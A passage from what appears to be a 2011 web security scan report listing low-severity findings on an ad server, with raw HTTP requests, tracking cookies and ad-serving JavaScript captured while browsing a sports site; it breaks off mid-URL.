Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUzeY1SQHCXN4FYj.Kh6_q8b3co0YDA3gBdZLNK4RRFIefc_P6SEix0ZQsWCjMQoiw87GghL9gFEpZS8hGQkqRsvGRGULMYqQQFhaysFBKySQ1aijKRxhDjmm8s5rVufc893fOs7hAOsY9gdXyjpR64P0BSAFxjgafJjEbPViuAqSiH8KJNrsZScZsLWB1eJHKBvhejbFhB2bOhdU4gJSMwcuhza4eizC.M2XjSNUW_LzGWDAPM_uFVedGin3wHLbZ.cg0ZqdZc226b19z6hj1PB.8wEy1Y1VnIYUBePLb7PC0G3NwjVUzj9QeI6Ytxo798XO7wfi57ZB6fqjnqnquq.eLPXP3M0U969XThZTrrlBZjN3dY7puSQiEkII18Pf.M8dl_oqeTdzsXmFa3J17.UWapemtFVIht08cAgleydaCU0iCzplIM.9EUrW5eCRoWXFHnmw2RErOsmRoc.kswjxDkqm36Df4m88v.GmAEg--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUIJjiCKHQ2hbNz1frZeo2glhRWy8DA3gBdZLLK4RRGIef9.RzSZJioylZsFAuSYiwc1lQwl8wCiXWErKZhJQiZTPIIORSpBAWFrKwUErJJEUNRbkN45LXNOZbzeo9533O77I4QCLG3YFVv47k78NbBxAHkjfge.nCeIaV.ZGCOfDf2.xxBLPcjuXMRIq74Ss6zK5csZjVKazmNaSkGr4XbNbvwEw6sWp6kNxBeNbMUN7FQzZm40TZEFK6Cj8vNvOlYyY.sSo9SM4GPH2F2alrDLNVp7pGzdtVnfYPeZ72nmFGm7DKkpGsG3j0htn.cRtm7xKr3I1UHCKm0WaH3si6bV9k3WZAe75rzwXtuaQ9n8Oe2x9x2rNKezqRIs0KFNrs9g7Tek3UTQDJXARv5z9znGfM69lE1O5kJUTM3MnIVi21rw0QD2ld4hCIWpMUHeQJMdAyHlymH0m8LqcPBB3znuCTlergSJ2VRF3OnATZXJ8k6S30Rf78.QWV5oeH; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 12:11:31 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 2139
Date: Mon, 13 Jun 2011 12:11:31 GMT

_348593_amg_acamp_id=171886;
_348593_amg_pcamp_id=78527;
_348593_amg_location_id=63086;
_348593_amg_creative_id=348593;
_348593_amg_loaded=true;
var _amg_348593_content='<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3727.Expedia.com/B5235969.34;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU9ghjlZF6iSwYlb.krXjG_wmefTlnZW8sdXNhLHQsMTMwNzk2NzA5MTgzNCxjLDM0ODU5MyxwYyw3ODUyNyxhYywxNzE4ODYsbyxOMC1TMCxsLDYzMDg2LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVUySFA2YW1aMmN1UURuLjFWUndwcktlUVpoaEZuWlc4c2RYTmhMSFFzTVRNd056azJOekE1TURVM05DeGpMRE0wT0RZMk15eHdZeXczT1RBeE5DeGhZeXd4TnpNME5USXNieXhPTUMxVE1DeHNMRFl6TkRZM0xIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTHpGeFRuZFFVWEpZTm5wZldHOHpRVGxEZEdaeVVIZEJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSU1d4RGJXODBhRFZRVW01ZllYbEVSMjkyUW1SNU9YWmZkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZFY21wM1ZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVhwblZVSkJaMVZEUVZGUlFVRkJRVUZ3VTFCYVpVRkJRVUZCUVM0dlkyNWtQU0ZIVVZac1MyZHBMWHBSVVZFMk5UaFhSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSlRlVzVqWWw4M01WUlpZWFZEWVZnMmJFRmxSakUzYm01RFpHWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRHMUNjMEZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0pWZWpaWFNERk1WMFV4TlVWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSM1NrZGlWbEpQVDFJNWIyaFZTMDVYYTFwVmEzWTFhQzB6TTJ0UkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=1150304106?">\n'+
'</SCRIPT><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=78527&c5=171886&c6=&cv=1.3&cj=1&rn=988152830" style="display:none" width="0" height="0" alt="" />';
document.writeln(_amg_348593_content);

18.2. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.amgdgt.com/ads/?t=i&f=j&p=4703&pl=fa517122&rnd=63939386815764010&clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU4OpWd517.zYBV7mFnlwf1Cu5A_1nZW8sdXNhLHQsMTMwNzk2NDAwODAxOSxjLDM0NjQ2NyxwYyw3OTcwMCxhYywxNzc5OTEsbyxOMC1TMCxsLDY0MDU0LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBQUVBQUFBQUFBQUFBUUFBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRRER0X3VTYzBkbEFfYXlER292QmR5OWs4dlZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFCSTlBVUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0F6QzFnQVZnOEJBZ1VDQVFRQUFBQUFNUnlxQ2dBQUFBQS4vY25kPSFid1hMTFFqYzNnUVF5T2dYR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJJTU84WlBMMVRiN2ZBNmJRbFFlTzVlRzRDTmZxLU5NQnI1NlU3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ1RjeU9IZzVNRjloYzhnQkNkb0JJR2gwZEhBNkx5OTNkM2N1ZEhkaFkydHNaUzVqYjIwdmFHVmhaR3hwYm1Wem1BTFFEOEFDQk1nQ2hkTFBDcWdEQWVnRGlBTG9BN1VJOVFNQUFBREVnQWFHcHFhYnk4VGR4X0VCJm51bT0xJnNpZz1BR2lXcXR5SFZZWFJvWGx5bzFLY3VoM2tpbnNiTTdXazJRJmNsaWVudD1jYS1wdWItNzQ5NDE1NjAyNzAxODM0MiZhZHVybD0K/clkurl=

The response contains the following links to other domains:

http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUPHluEI0CFhQMntGSMIANeF9ITIFnZW8sdXNhLHQsMTMwNzk2NDAxMjUyMyxjLDM0NTc2OCxwYyw3NzQ4MyxhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk1LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVU0T3BXZDUxNy56WUJWN21Gbmx3ZjFDdTVBXzFuWlc4c2RYTmhMSFFzTVRNd056azJOREF3T0RBeE9TeGpMRE0wTmpRMk55eHdZeXczT1Rjd01DeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMExIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSUkVSMFgzVlRZekJrYkVGZllYbEVSMjkyUW1SNU9XczRkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RsQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZabk9FSkJaMVZEUVZGUlFVRkJRVUZOVW5seFEyZEJRVUZCUVM0dlkyNWtQU0ZpZDFoTVRGRnFZek5uVVZGNVQyZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSkpUVTg0V2xCTU1WUmlOMlpCTm1KUmJGRmxUelZsUnpSRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFVm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNVNGWlpXRkp2V0d4NWJ6RkxZM1ZvTTJ0cGJuTmlUVGRYYXpKUkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=346030314?
http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=77483&c5=169976&c6=&cv=1.3&cj=1&rn=1964927325

Request

GET /ads/?t=i&f=j&p=4703&pl=fa517122&rnd=63939386815764010&clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU4OpWd517.zYBV7mFnlwf1Cu5A_1nZW8sdXNhLHQsMTMwNzk2NDAwODAxOSxjLDM0NjQ2NyxwYyw3OTcwMCxhYywxNzc5OTEsbyxOMC1TMCxsLDY0MDU0LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBQUVBQUFBQUFBQUFBUUFBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRRER0X3VTYzBkbEFfYXlER292QmR5OWs4dlZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFCSTlBVUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0F6QzFnQVZnOEJBZ1VDQVFRQUFBQUFNUnlxQ2dBQUFBQS4vY25kPSFid1hMTFFqYzNnUVF5T2dYR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJJTU84WlBMMVRiN2ZBNmJRbFFlTzVlRzRDTmZxLU5NQnI1NlU3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ1RjeU9IZzVNRjloYzhnQkNkb0JJR2gwZEhBNkx5OTNkM2N1ZEhkaFkydHNaUzVqYjIwdmFHVmhaR3hwYm1Wem1BTFFEOEFDQk1nQ2hkTFBDcWdEQWVnRGlBTG9BN1VJOVFNQUFBREVnQWFHcHFhYnk4VGR4X0VCJm51bT0xJnNpZz1BR2lXcXR5SFZZWFJvWGx5bzFLY3VoM2tpbnNiTTdXazJRJmNsaWVudD1jYS1wdWItNzQ5NDE1NjAyNzAxODM0MiZhZHVybD0K/clkurl= HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982003&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964003305&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307964003248&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=997306818&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2F&fu=0&ifi=3&dtd=12&xpc=7SXqZNuALm&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUabUl55ctWfbz4_8QgoT4EM3BowwDA3gBY2BgYGJg2u7OwOqZzMBoHsLA8MuMgYGBk4GB0aBj17NXDEwZjxhYnv5iYFRbxcBwLx8mJ3NDdTmQDQa.X4MZGLgYGOQrGWUYGRhYNjCKAikGA0YGIJU.FSyoeIKRG8hbvhQst84DTEktYeQHCi46B1a5rJ5REMgD2_saYjIANIEckg--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUDRAzJ1dy92UUy6XZNhO4lnPwLrMDA3gBY2BgYGZgmv6DgdVtBQOj3moGhk.fGRgYOBkYGA06dn1_zcC03Z2B1TOZgdE8hIHhlxlC7tkrBqaMRwwsT38xMKqtYmC4lw.Tk7mhuhzIBgPfr8EMDFwMDPKVjDKMDAwsGxhFgRSDASMDkEqfChZUPMHIDeQtXwqWW.cBpqSWMPIDBRedA6tcVs8oCORB3QQ2GQDT5yVF; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:20:12 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 2160
Date: Mon, 13 Jun 2011 11:20:12 GMT

_345768_amg_acamp_id=169976;
_345768_amg_pcamp_id=77483;
_345768_amg_location_id=62195;
_345768_amg_creative_id=345768;
_345768_amg_loaded=true;
var _amg_345768_content='<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUPHluEI0CFhQMntGSMIANeF9ITIFnZW8sdXNhLHQsMTMwNzk2NDAxMjUyMyxjLDM0NTc2OCxwYyw3NzQ4MyxhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk1LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVU0T3BXZDUxNy56WUJWN21Gbmx3ZjFDdTVBXzFuWlc4c2RYTmhMSFFzTVRNd056azJOREF3T0RBeE9TeGpMRE0wTmpRMk55eHdZeXczT1Rjd01DeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMExIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSUkVSMFgzVlRZekJrYkVGZllYbEVSMjkyUW1SNU9XczRkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RsQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZabk9FSkJaMVZEUVZGUlFVRkJRVUZOVW5seFEyZEJRVUZCUVM0dlkyNWtQU0ZpZDFoTVRGRnFZek5uVVZGNVQyZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSkpUVTg0V2xCTU1WUmlOMlpCTm1KUmJGRmxUelZsUnpSRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFVm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNVNGWlpXRkp2V0d4NWJ6RkxZM1ZvTTJ0cGJuTmlUVGRYYXpKUkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=346030314?">\n'+
'</SCRIPT>\n'+
'<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=77483&c5=169976&c6=&cv=1.3&cj=1&rn=1964927325" style="display:none" width="0" height="0" alt="" />';
document.writeln(_amg_345768_content);

18.3. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.amgdgt.com/ads/?t=i&f=j&p=5112&pl=d11d969d&rnd=88260929775424300&clkurl=http://ib.adnxs.com/click/AAAAAAAAAEAAAAAAAAAAQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQKvA-an9NlBy_ayDGovBdy-f8_VNAAAAAIwuAAC1AAAAlgIAAAIAAABI1QYA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gAogUBAgUCAQQAAAAADhxk8gAAAAA./cnd=!7QRzKAi5uAUQyKobGNHHASAA/referrer=http%3A%2F%2Fwww.twackle.com%2Fheadlines/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBaW--n_P1TZTsE4mGlgfileStCNfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmALQD8ACBMgChdLPCqgDAegDiALoA7UI9QMAAADAgAaKnKHz3tiP7BA%26num%3D1%26sig%3DAGiWqtxUhiqeIbn-0Yqm9s4vdBruCHNPZQ%26client%3Dca-pub-7494156027018342%26adurl%3D

The response contains the following link to another domain:

http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=81860&c5=179933&c6=&cv=1.3&cj=1&rn=1481469077

Request

GET /ads/?t=i&f=j&p=5112&pl=d11d969d&rnd=88260929775424300&clkurl=http://ib.adnxs.com/click/AAAAAAAAAEAAAAAAAAAAQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQKvA-an9NlBy_ayDGovBdy-f8_VNAAAAAIwuAAC1AAAAlgIAAAIAAABI1QYA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gAogUBAgUCAQQAAAAADhxk8gAAAAA./cnd=!7QRzKAi5uAUQyKobGNHHASAA/referrer=http%3A%2F%2Fwww.twackle.com%2Fheadlines/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBaW--n_P1TZTsE4mGlgfileStCNfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmALQD8ACBMgChdLPCqgDAegDiALoA7UI9QMAAADAgAaKnKHz3tiP7BA%26num%3D1%26sig%3DAGiWqtxUhiqeIbn-0Yqm9s4vdBruCHNPZQ%26client%3Dca-pub-7494156027018342%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982318&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964318507&bpp=5&shv=r20110608&jsv=r20110607&correlator=1307964318556&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1852423368&ga_fc=1&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895298%2C33895143&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=193&xpc=vvOBQeNuNQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUd82FXKEzvkk4qPARd_ALhgOPpsYDA3gBY2BgYGZgmv6DgdVtBQOj3moGhk.fGRgYOBkYGA06dv3kZGDa7s7A6pnMwGgewsDwywwh9.wVA1PGIwaWp78YGNVWMTDcy4fJydxQXQ5kM.HUu1uLF6edu1V1gXoZfL8GMzBwMzDIVzLKMDIwsGxgFAVSDAaMDEAqfSpYUPEEIzeQt_AAWHD5UrCSdR5gSmoJIz9QbtE5sNyyekZBIA_opT2ty0DGMzAAACb.MUk-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUoa8luhwfhKEzI0u6DHvKJtigrxMDA3gBY2BgYGFg2neXgdVuPgOj_REGRqYQBgYGTgYGRoOO_Vt_MTBN_8HA6raCgVFvNQPDp89wuV0_ORmYtrszsHomMzCaA_X8MkPIPXvFwJTxiIHl6S8GRrVVDAz38mFyMjdUlwPZTDj17tbixWnnblVdoF4G36_BDAzcDAzylYwyjED3b2AUBVIMBoxAYxnSp4IFFU8wcgMFFx5gZABSy5eClazzAFNSSxj5gYKLzoHlltUzCgJ5UO.CzGcAAEOOONw-; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:25:23 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 1924
Date: Mon, 13 Jun 2011 11:25:23 GMT

_343711_amg_acamp_id=179933;
_343711_amg_pcamp_id=81860;
_343711_amg_location_id=66132;
_343711_amg_creative_id=343711;
_343711_amg_loaded=true;
var _amg_343711_content='<script language="Javascript">
...[SNIP]...
</noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=81860&c5=179933&c6=&cv=1.3&cj=1&rn=1481469077" style="display:none" width="0" height="0" alt="" />';
document.writeln(_amg_343711_content);

18.4. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.amgdgt.com/ads/?t=i&f=j&p=4703&pl=a64d67a0&rnd=81183589948341250&clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUZHj7agfUq3LgNFPlz3dOP4A.7mxnZW8sdXNhLHQsMTMwNzk2NjE3MTQyNSxjLDM0NjUwNyxwYyw4MDgxNSxhYywxNzczNTgsbyxOMC1TMCxsLDY1MjY4LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1VyZ2VoZXRSNkQ5U3VCNkY2MUhvUHdBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRQUdZRTNkY0tZaEhfYXlER292QmR5X1ktdlZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFDTWNBWUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0F6QzFnQU5BWUJBZ1VDQVFRQUFBQUExU0RFc2dBQUFBQS4vY25kPSEzQVNuSndqWGtBVVFqT0VaR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJqcVIyMlByMVRlMldCTWppbFFmZzQ4V1hDZGZxLU5NQnI1NlU3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ1RjeU9IZzVNRjloYzhnQkNkb0JJR2gwZEhBNkx5OTNkM2N1ZEhkaFkydHNaUzVqYjIwdmFHVmhaR3hwYm1